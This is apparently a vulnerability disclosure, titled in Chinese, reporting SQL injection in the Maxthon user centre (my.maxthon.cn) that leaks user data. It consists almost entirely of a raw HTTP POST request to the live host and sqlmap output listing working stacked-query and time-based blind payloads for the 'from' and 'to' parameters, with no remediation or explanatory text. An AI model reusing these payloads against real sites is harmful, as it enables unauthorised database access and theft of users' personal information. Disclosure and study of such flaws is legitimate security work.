傲游用户中心SQL注入漏洞泄露大量用户信息

POST /api/scorelist HTTP/1.1
 Host: my.maxthon.cn
 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://my.maxthon.cn/score.html
 Content-Length: 70
 Cookie: **.***.**.**
 Connection: close
 Pragma: no-cache
 Cache-Control: no-cache
 
 formkey=caa6bb30&from=2013-05-16&to=2016-05-26&type=&page=1

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: to (POST)
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26';(SELECT * FROM (SELECT(SLEEP(5)))Atjg)#&type=&page=1
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26' AND (SELECT * FROM (SELECT(SLEEP(5)))gGIX) AND 'CVSc'='CVSc&type=&page=1
 
 Parameter: from (POST)
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: formkey=caa6bb30&from=2013-05-16';(SELECT * FROM (SELECT(SLEEP(5)))Qbzm)#&to=2016-05-26&type=&page=1
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: formkey=caa6bb30&from=2013-05-16' AND (SELECT * FROM (SELECT(SLEEP(5)))owig) AND 'odrf'='odrf&to=2016-05-26&type=&page=1